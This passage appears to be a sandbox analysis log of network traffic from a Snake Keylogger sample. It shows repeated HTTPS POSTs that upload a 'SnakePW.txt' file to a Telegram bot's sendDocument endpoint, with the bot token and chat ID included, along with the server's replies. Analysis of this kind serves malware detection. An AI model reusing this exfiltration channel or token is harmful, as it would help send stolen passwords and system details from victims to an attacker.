                                                                    2022-06-26 07:32:52 UTC58INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66781,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228772,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    35192.168.2.549805149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:52 UTC59OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756dccf3dde
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:52 UTC59OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 63 63 66 33 64 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756dccf3ddeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:53 UTC59INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:53 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:53 UTC60INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66782,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228773,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    36192.168.2.549808149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:53 UTC60OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756dd2c38c7
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:53 UTC61OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 64 32 63 33 38 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756dd2c38c7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:54 UTC61INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:54 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:54 UTC62INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66783,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228774,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    37192.168.2.549809149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:54 UTC62OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ddc4cf8a
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:54 UTC62OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 64 63 34 63 66 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ddc4cf8aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:54 UTC63INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:54 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:54 UTC63INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66784,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228774,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    38192.168.2.549810149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:55 UTC64OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756de5d655e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:55 UTC64OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 65 35 64 36 35 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756de5d655eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:55 UTC65INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:55 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:55 UTC65INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66785,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228775,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    39192.168.2.549812149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:55 UTC65OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756dea2895d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:55 UTC66OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 65 61 32 38 39 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756dea2895dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:56 UTC66INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:56 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:56 UTC67INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66786,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228776,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    4192.168.2.549772149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:39 UTC6OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d535c47f
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:39 UTC7OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 35 33 35 63 34 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d535c47fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:40 UTC7INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:40 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:40 UTC7INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66750,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228760,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    40192.168.2.549814149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:56 UTC67OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756dee54c34
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:56 UTC67OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 65 65 35 34 63 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756dee54c34Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:56 UTC68INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:56 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
